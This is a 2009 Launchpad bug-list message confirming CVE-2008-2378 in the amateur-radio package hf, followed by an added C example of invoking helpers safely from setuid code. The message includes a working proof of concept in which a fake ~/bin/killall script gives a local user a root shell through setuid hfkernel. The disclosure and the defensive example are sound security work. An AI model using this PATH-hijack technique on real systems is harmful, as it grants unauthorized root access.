[Bug 320082] Re: [CVE-2008-2378] - Untrusted search path vulnerability in hfkernel in hf 0.7.3 and 0.8 allows local users to gain privileges via a Trojan horse

Stefan Lesicnik stefan at lsd.co.za
Mon Jan 26 13:12:21 UTC 2009


I can confirm this bug as tested in a chroot environment.

Below is an extract from the Debian bug; it functioned the same.  It
relies on ~/bin being in the $PATH, which is the default .profile
function if a ~/bin directory exists.

The hf package, described by Debian as an amateur-radio protocol suite
 using a soundcard as a modem, is a program that eventually becomes
 setuid(0), and has a trivial security hole in it.

 By default the package installs "/usr/bin/hfkernel" as a typical binary,
 but when first started via the program "hf" the binary is changed to
 be setuid(root).

 This is demonstrated:

skx@gold:~$ hf
Hello I am hf, the startscript for hfterm & hfkernel.
I look for them in /usr/bin. If wrong, edit me.
hfkernel must run with root rights.
The suid bit has to be set. Be aware that this can be a security hole.
Please do as root "chmod 4755 /usr/bin/hfkernel".
or start this script again as root.


 If you do start the program as root the permissions are changed:

skx@gold:~$ sudo hf
Hello I am hf, the startscript for hfterm & hfkernel.
I look for them in /usr/bin. If wrong, edit me.
hfkernel must run with root rights.
The suid bit has to be set. But be aware that this can be a security hole.
I will do this now "chmod 4755 /usr/bin/hfkernel".
For you, root, I will start only hfkernel for test purposes.
...

  Now the program is setuid:

skx@gold:~$ ls -l /usr/bin/hfkernel
-rwsr-xr-x 1 root root 244120 2008-05-07 19:37 /usr/bin/hfkernel

  Creating ~/bin/killall is sufficient to gain root privileges.

skx@gold:~$ echo -e '#!/bin/sh\n/bin/sh' > ~/bin/killall
skx@gold:~$ chmod 755 ~/bin/killall
skx@gold:~$ hfkernel -k
sh-3.2# id
uid=1000(skx) gid=1000(skx) euid=0(root)

-- 
[CVE-2008-2378] - Untrusted search path vulnerability in hfkernel in hf 0.7.3 and 0.8 allows local users to gain privileges via a Trojan horse
https://bugs.launchpad.net/bugs/320082
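One way a setuid program can run a helper such as killall without consulting the caller's $PATH, shown as an added example (it is not hfkernel's code and not part of the original message). The name run_helper, the fixed PATH value and the constructed PATH in main are assumptions, as is the premise that the helper itself does not need root.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Pattern behind the report (how hfkernel invokes killall is not shown on
 * the page; a bare name passed to system() or execlp() is assumed):
 *     system("killall hfkernel");   resolved via the caller's $PATH, euid 0
 */

/* Fixed environment handed to every helper; nothing is inherited. */
static char *const SAFE_ENV[] = { "PATH=/usr/bin:/bin", NULL };

/* Hypothetical helper: run a program by absolute path, with a clean
 * environment and with setuid privileges dropped in the child.
 * Returns the helper's exit status, or -1 on error. */
int run_helper(const char *abs_path, char *const argv[])
{
    if (abs_path == NULL || abs_path[0] != '/')
        return -1;                 /* refuse names that $PATH would resolve */

    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        /* Child: drop group first, then user, back to the real ids. */
        if (setgid(getgid()) != 0 || setuid(getuid()) != 0)
            _exit(126);
        execve(abs_path, argv, SAFE_ENV);   /* no shell, no PATH search */
        _exit(127);                         /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

int main(void)
{
    /* Constructed scenario: PATH begins with a user-writable directory. */
    setenv("PATH", "/tmp/untrusted-bin:/usr/bin:/bin", 1);
    char *const argv[] = { "sh", "-c", "echo \"helper sees PATH=$PATH\"", NULL };
    printf("exit status: %d\n", run_helper("/bin/sh", argv));
    return 0;
}
```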